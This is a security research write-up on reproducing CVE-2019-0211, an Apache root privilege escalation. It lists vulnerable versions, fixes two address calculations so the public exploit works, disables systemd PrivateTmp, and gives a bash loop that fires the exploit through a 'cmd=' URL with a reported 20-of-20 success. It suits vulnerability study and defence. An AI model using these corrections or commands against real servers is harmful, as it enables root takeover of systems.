Author: Hcamael@Knownsec 404 Team
Chinese Version: https://paper.seebug.org/889/
In April, Apache root privilege escalation was revealed, and its exploitation scripts was released on GitHub. This paper mainly discusses the problems when recurring this vulnerability.
The recurring environment
# 系统, 跟系统关系不是很大，主要问题是能不能用包管理器安装对应版本的apache $ lsb_release -a Distributor ID: Ubuntu Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic # Apache版本，复现的关键就在该版本 $ apache2 -v Server version: Apache/2.4.29 (Ubuntu) Server built: 2018-03-02T02:19:31 # php版本 $ php -v PHP 7.2.15-0ubuntu0.18.04.2 (cli) (built: Mar 22 2019 17:05:14) ( NTS ) Copyright (c) 1997-2018 The PHP Group Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies with Zend OPcache v7.2.15-0ubuntu0.18.04.2, Copyright (c) 1999-2018, by Zend Technologies
- The specified version:
# apt install apache2=2.4.29-1ubuntu4 apache2-bin=2.4.29-1ubuntu4 apache2-utils=2.4.29-1ubuntu4 apache2-data=2.4.29-1ubuntu4.
- Use apt to install PHP directly.
- The exp address: https://github.com/cfreal/exploits/blob/master/CVE-2019-0211-apache/cfreal-carpediem.php.
- Open the "ssl" module:
The explanations of the need to open "ssl" module:
- Even if you don't open the "ssl" module, the vulnerability exists.
- Even if you don't open the "ssl" module, you can modify the Apache configuration and open other ports.
- If you only open port 80, you need to find another utilization chain. It is announced on GitHub that exp is invalid with only one port open.
- The relevant code can be seen in 1 and 2, as well as the macro definition of
/* On some architectures it's safe to do unserialized accept()s in the single * Listen case. But it's never safe to do it in the case where there's * multiple Listen statements. Define SINGLE_LISTEN_UNSERIALIZED_ACCEPT * when it's safe in the single Listen case. */ #ifdef SINGLE_LISTEN_UNSERIALIZED_ACCEPT #define SAFE_ACCEPT(stmt) (ap_listeners->next ? (stmt) : APR_SUCCESS) #else #define SAFE_ACCEPT(stmt) (stmt) #endif
Simply to say, the mutex is generated only when Apache opens multiple ports, and the exp posted on GitHub is exploited by apex.
Problems in recurring vulnerability
Having tried a lot of versions, no one can directly use the exp on GitHub. In the above versions, two problems are found to cause the utilization failure:
- Calculation problem in
$all_buckets = $i - 0x10.
- Calculation problem in
$bucket_index = $bucket_index_middle - (int) ($total_nb_buckets / 2);.
In the first point, if you use GDB to debug the address that calculates the
all_buckets, you will find that the value is true. However, after executing the
apache2ctl graceful command,
all_buckets generates a new value, but only
0x38000 from the previous one, and this problem can be easily solved:
$all_buckets = $i - 0x10 + 0x38000;
Change the second calculation directly as follows:
$bucket_index = $bucket_index_middle;
Problems when recurring vulnerability in Ubuntu:
It seems that it was executed successfully, but the "2323232" file was not found in the
/tmp directory. The futher study suggests that
systemd redirected the
tmp directory in Apache. Execute
$find /tmp -name "2323232" to find the file, but only the root user can access it. It’s very simple if you don't want
systemd to redirect the
tmp directory. Set it false like this:
PrivateTmp=false. Restart it after change and test it again, you can write the file under the
$ cat /lib/systemd/system/apache2.service [Unit] Description=The Apache HTTP Server After=network.target remote-fs.target nss-lookup.target [Service] Type=forking Environment=APACHE_STARTED_BY_SYSTEMD=true ExecStart=/usr/sbin/apachectl start ExecStop=/usr/sbin/apachectl stop ExecReload=/usr/sbin/apachectl graceful PrivateTmp=false Restart=on-abort [Install] WantedBy=multi-user.target
About success rate
It’s said that it can’t be 100% successful in exp’s annotation, so I write a script to test.
root@vultr:~# cat check #!/bin/bash SUCC=0 COUNT=0 for i in $(seq 1 20) do let COUNT+=1 /etc/init.d/apache2 stop sleep 1 /etc/init.d/apache2 start if [ -f "/tmp/1982347" ];then rm /tmp/1982347 fi curl "http://localhost/cfreal-carpediem.php?cmd=id>/tmp/1982347" apache2ctl graceful sleep 1 if [ -f "/tmp/1982347" ];then let SUCC+=1 fi done echo "COUNT: $COUNT" echo "SUCCESS: $SUCC"
The results of testing for 20 times: no failures.
# ./check ...... COUNT: 20 SUCCESS: 20
Other versions have not been tested yet, but here are some suggestions.
After the exp is executed, the corresponding
all_bucketsaddresses will be output. You can use
gdb attachto check whether the address is correct:
PS: Only when you install the dbg package, there is the
apt install apache2-dbg=2.4.29-1ubuntu4.
If there is a problem, debug and check the process of searching for the
all_bucketsaddress in exp. If there is no problem, use “gdb attach” main process (the process with root privileges) to set a breakpoint at
make_child, and then execute
apache2ctl graceful. When gdb's flow jumps to the
p all_bucketsagain. Compared with the value obtained by exp, there is no problem if it is the same.
The previous process is the same as above, focusing on the code assigned by
It should be noted that there is a fork above, so add
set follow-fork-mode childin gdb.
The value of
my_bucketpoints to the address of the heap. If the value of
my_bucketis no problem, exp is basically true. If not, adjust
The "debian 9" is tested successfully.
# cat /etc/issue Debian GNU/Linux 9 \n \l # apache2 -v Server version: Apache/2.4.25 (Debian) Server built: 2018-11-03T18:46:19 # php -v PHP 7.0.33-0+deb9u3 (cli) (built: Mar 8 2019 10:01:24) ( NTS ) Copyright (c) 1997-2017 The PHP Group Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies with Zend OPcache v7.0.33-0+deb9u3, Copyright (c) 1999-2017, by Zend Technologies
About Knownsec & 404 Team
Beijing Knownsec Information Technology Co., Ltd. was established by a group of high-profile international security experts. It has over a hundred frontier security talents nationwide as the core security research team to provide long-term internationally advanced network security solutions for the government and enterprises.
Knownsec's specialties include network attack and defense integrated technologies and product R&D under new situations. It provides visualization solutions that meet the world-class security technology standards and enhances the security monitoring, alarm and defense abilities of customer networks with its industry-leading capabilities in cloud computing and big data processing. The company's technical strength is strongly recognized by the State Ministry of Public Security, the Central Government Procurement Center, the Ministry of Industry and Information Technology (MIIT), China National Vulnerability Database of Information Security (CNNVD), the Central Bank, the Hong Kong Jockey Club, Microsoft, Zhejiang Satellite TV and other well-known clients.
404 Team, the core security team of Knownsec, is dedicated to the research of security vulnerability and offensive and defensive technology in the fields of Web, IoT, industrial control, blockchain, etc. 404 team has submitted vulnerability research to many well-known vendors such as Microsoft, Apple, Adobe, Tencent, Alibaba, Baidu, etc. And has received a high reputation in the industry.
本文由 Seebug Paper 发布，如需转载请注明来源。本文地址：https://paper.seebug.org/928/